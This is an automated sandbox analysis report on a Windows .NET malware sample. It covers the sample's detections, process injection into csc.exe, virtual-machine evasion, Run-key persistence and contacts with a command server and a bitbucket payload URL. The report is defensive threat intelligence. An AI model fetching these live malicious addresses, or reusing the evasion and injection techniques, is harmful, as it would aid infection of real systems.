Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4JwhvqLe8n.exe

Overview

General Information

Sample name:4JwhvqLe8n.exe
renamed because original name is a hash value
Original sample name:66e6c38dc2c5e1dc03209e8f876d546c94a1b806c6e02c3b33f5e523eb3fdff9.exe
Analysis ID:1573906
MD5:b58e300ca8077adc4094e9044bcdbbc8
SHA1:abc3b46626e17e22b744b9fe44833919255121ce
SHA256:66e6c38dc2c5e1dc03209e8f876d546c94a1b806c6e02c3b33f5e523eb3fdff9
Tags:181-131-217-244exeuser-JAMESWT_MHT
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for submitted file
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
Drops large PE files
Injects a PE file into a foreign processes
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 4JwhvqLe8n.exe (PID: 8068 cmdline: "C:\Users\user\Desktop\4JwhvqLe8n.exe" MD5: B58E300CA8077ADC4094E9044BCDBBC8)
    • csc.exe (PID: 7552 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.2630059901.0000000007DB2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000003.00000002.2630667108.0000000009540000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000003.00000002.2629450491.0000000006C11000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        Process Memory Space: csc.exe PID: 7552JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          3.2.csc.exe.9540000.4.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            3.2.csc.exe.7e36ca8.2.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\4JwhvqLe8n.exe, ProcessId: 8068, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OrionLegacyCLI

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: 4JwhvqLe8n.exeReversingLabs: Detection: 42%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

              Compliance

              barindex
              Detected unpacking (creates a PE file in dynamic memory)
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeUnpacked PE file: 1.2.4JwhvqLe8n.exe.2370000.2.unpack
              Source: 4JwhvqLe8n.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.10:49772 version: TLS 1.2
              Source: 4JwhvqLe8n.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\samcnary\Desktop\legacyPM\core\CoreService\runtime\OriginLegacyCLI.pdb source: 4JwhvqLe8n.exe, OrionLegacyCLI.exe.1.dr
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: csc.exe, 00000003.00000002.2629450491.0000000006E78000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1636529766.00000000081C5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2631230382.0000000009F80000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1636529766.0000000008283000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: Srlfeb.pdb source: csc.exe, 00000003.00000003.1636529766.000000000808E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2630517954.00000000093D0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1636529766.0000000007EAC000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: csc.exe, 00000003.00000002.2629450491.0000000006E78000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1636529766.00000000081C5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2631230382.0000000009F80000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1636529766.0000000008283000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: csc.exe, 00000003.00000003.1636529766.000000000808E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1636529766.00000000081C5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2630705597.00000000095A0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: csc.exe, 00000003.00000003.1636529766.000000000808E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1636529766.00000000081C5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2630705597.00000000095A0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: Srlfeb.pdbx source: csc.exe, 00000003.00000003.1636529766.000000000808E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2630517954.00000000093D0000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1636529766.0000000007EAC000.00000004.00000800.00020000.00000000.sdmp
              Source: global trafficTCP traffic: 192.168.2.10:49766 -> 181.131.217.244:30203
              Source: global trafficHTTP traffic detected: GET /facturacioncol/fact/downloads/null.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 181.131.217.244 181.131.217.244
              Source: Joe Sandbox ViewIP Address: 185.166.143.49 185.166.143.49
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /facturacioncol/fact/downloads/null.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: navegacionseguracol24vip.org
              Source: global trafficDNS traffic detected: DNS query: bitbucket.org
              Source: csc.exe, 00000003.00000002.2629450491.0000000006F0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bitbucket.org
              Source: csc.exe, 00000003.00000002.2629450491.0000000006C11000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2629450491.0000000006F0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: csc.exe, 00000003.00000002.2629450491.0000000006EF7000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2629450491.0000000006C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
              Source: csc.exe, 00000003.00000002.2629450491.0000000006E78000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2629450491.0000000006C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/facturacioncol/fact/downloads/null.exe
              Source: csc.exe, 00000003.00000003.1636529766.000000000808E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1636529766.00000000081C5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2630705597.00000000095A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
              Source: csc.exe, 00000003.00000003.1636529766.000000000808E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1636529766.00000000081C5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2630705597.00000000095A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
              Source: csc.exe, 00000003.00000003.1636529766.000000000808E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1636529766.00000000081C5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2630705597.00000000095A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
              Source: csc.exe, 00000003.00000003.1636529766.000000000808E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1636529766.00000000081C5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2630705597.00000000095A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
              Source: csc.exe, 00000003.00000003.1636529766.000000000808E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1636529766.00000000081C5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2629450491.0000000006C11000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2630705597.00000000095A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
              Source: csc.exe, 00000003.00000003.1636529766.000000000808E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1636529766.00000000081C5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.2630705597.00000000095A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.10:49772 version: TLS 1.2

              System Summary

              barindex
              .NET source code contains very large array initializations
              Source: 1.2.4JwhvqLe8n.exe.820000.1.raw.unpack, MapAnalyzer.csLarge array initialization: LinkSetMap: array initializer size 543568
              Drops large PE files
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeFile dump: OrionLegacyCLI.exe.1.dr 979567344Jump to dropped file
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040A8CC1_2_0040A8CC
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040B0771_2_0040B077
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0041E8141_2_0041E814
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040B0351_2_0040B035
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040B0D91_2_0040B0D9
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040B08B1_2_0040B08B
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040B0951_2_0040B095
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_004219431_2_00421943
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040A9541_2_0040A954
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040A96E1_2_0040A96E
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040A9D81_2_0040A9D8
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040A9841_2_0040A984
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040B9A71_2_0040B9A7
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040A9AE1_2_0040A9AE
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_004152101_2_00415210
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040AAC91_2_0040AAC9
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040AAFE1_2_0040AAFE
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040AAAD1_2_0040AAAD
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040AAB21_2_0040AAB2
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040B3421_2_0040B342
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040BB4A1_2_0040BB4A
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040B3351_2_0040B335
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040BBF11_2_0040BBF1
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040B3A91_2_0040B3A9
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040B4591_2_0040B459
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040B4011_2_0040B401
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040B4101_2_0040B410
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040B41F1_2_0040B41F
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040B4891_2_0040B489
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040B4941_2_0040B494
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040BD591_2_0040BD59
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040BD601_2_0040BD60
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0041ED651_2_0041ED65
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040BD661_2_0040BD66
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040B5041_2_0040B504
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040B5241_2_0040B524
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040B5D41_2_0040B5D4
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_00407E571_2_00407E57
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0041FDAB1_2_0041FDAB
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040B5B81_2_0040B5B8
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040ADBC1_2_0040ADBC
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_00421E531_2_00421E53
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040B6091_2_0040B609
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040AE151_2_0040AE15
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040B6161_2_0040B616
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040AE1C1_2_0040AE1C
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040C6351_2_0040C635
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040AE381_2_0040AE38
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040AF5C1_2_0040AF5C
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040AF641_2_0040AF64
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040BF781_2_0040BF78
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040B7091_2_0040B709
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040BFD11_2_0040BFD1
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_0040BFB01_2_0040BFB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_069847D23_2_069847D2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_069871583_2_06987158
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_069871483_2_06987148
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_06981BB03_2_06981BB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_06981BC03_2_06981BC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_069848683_2_06984868
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_094B073F3_2_094B073F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_094B0A773_2_094B0A77
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_094B17E83_2_094B17E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_094C258B3_2_094C258B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_094C307F3_2_094C307F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_094C30AF3_2_094C30AF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095F59383_2_095F5938
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095F4D203_2_095F4D20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095F0DD83_2_095F0DD8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095F27583_2_095F2758
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095F76203_2_095F7620
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095FC9E23_2_095FC9E2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095FCBF23_2_095FCBF2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095FCBBB3_2_095FCBBB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095FCAEE3_2_095FCAEE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095F50683_2_095F5068
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095FA4B03_2_095FA4B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_095F76133_2_095F7613
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: String function: 00406CC0 appears 34 times
              Source: 4JwhvqLe8n.exeBinary or memory string: OriginalFilename vs 4JwhvqLe8n.exe
              Source: 4JwhvqLe8n.exe, 00000001.00000000.1363317490.000000000062A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOriginLegacyCLI.exe@ vs 4JwhvqLe8n.exe
              Source: 4JwhvqLe8n.exe, 00000001.00000002.1649945495.0000000002696000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOriginLegacyCLI.exe@ vs 4JwhvqLe8n.exe
              Source: 4JwhvqLe8n.exe, 00000001.00000002.1649693766.0000000002406000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameYtzlkwamt.exe" vs 4JwhvqLe8n.exe
              Source: 4JwhvqLe8n.exeBinary or memory string: OriginalFilenameOriginLegacyCLI.exe@ vs 4JwhvqLe8n.exe
              Source: 4JwhvqLe8n.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 1.2.4JwhvqLe8n.exe.820000.1.raw.unpack, MapAnalyzer.csCryptographic APIs: 'CreateDecryptor'
              Source: 1.2.4JwhvqLe8n.exe.820000.1.raw.unpack, ResponderElement.csCryptographic APIs: 'CreateDecryptor'
              Source: 1.2.4JwhvqLe8n.exe.820000.1.raw.unpack, ResponderElement.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.csc.exe.93d0000.3.raw.unpack, H9dYhdNnGJ0iMLyBevQ.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.csc.exe.93d0000.3.raw.unpack, H9dYhdNnGJ0iMLyBevQ.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.csc.exe.93d0000.3.raw.unpack, H9dYhdNnGJ0iMLyBevQ.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.csc.exe.93d0000.3.raw.unpack, H9dYhdNnGJ0iMLyBevQ.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.3.csc.exe.82339c8.1.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
              Source: 3.3.csc.exe.82339c8.1.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
              Source: 3.3.csc.exe.82339c8.1.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
              Source: 3.3.csc.exe.82339c8.1.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
              Source: 3.2.csc.exe.93d0000.3.raw.unpack, yv34WfaQCCjcVmxruN1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 3.2.csc.exe.93d0000.3.raw.unpack, Y0wasUa6P9xTSH777MP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 3.2.csc.exe.93d0000.3.raw.unpack, h5gmjUDfwmEIIaJIRm.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 3.2.csc.exe.93d0000.3.raw.unpack, h5gmjUDfwmEIIaJIRm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 3.3.csc.exe.82339c8.1.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 3.3.csc.exe.82339c8.1.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 3.3.csc.exe.82339c8.1.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 3.3.csc.exe.82339c8.1.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 3.3.csc.exe.82339c8.1.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 3.3.csc.exe.82339c8.1.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: classification engineClassification label: mal96.evad.winEXE@3/1@2/2
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 1_2_00401020 LoadResource,LockResource,SizeofResource,1_2_00401020
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeFile created: C:\Users\user\Videos\OrionLegacyJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMutant created: NULL
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMutant created: \Sessions\1\BaseNamedObjects\mono1234
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\nvhcdek.exeJump to behavior
              Source: 4JwhvqLe8n.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 4JwhvqLe8n.exeReversingLabs: Detection: 42%
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeFile read: C:\Users\user\Desktop\4JwhvqLe8n.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\4JwhvqLe8n.exe "C:\Users\user\Desktop\4JwhvqLe8n.exe"
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeSection loaded: crowdstrikeceoisextragay.dllJump to behavior
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeSection loaded: sentinelisabadedrtrynexttimemaybe.dllJump to behavior
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\4JwhvqLe8n.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mswsock.dllJump to behavior
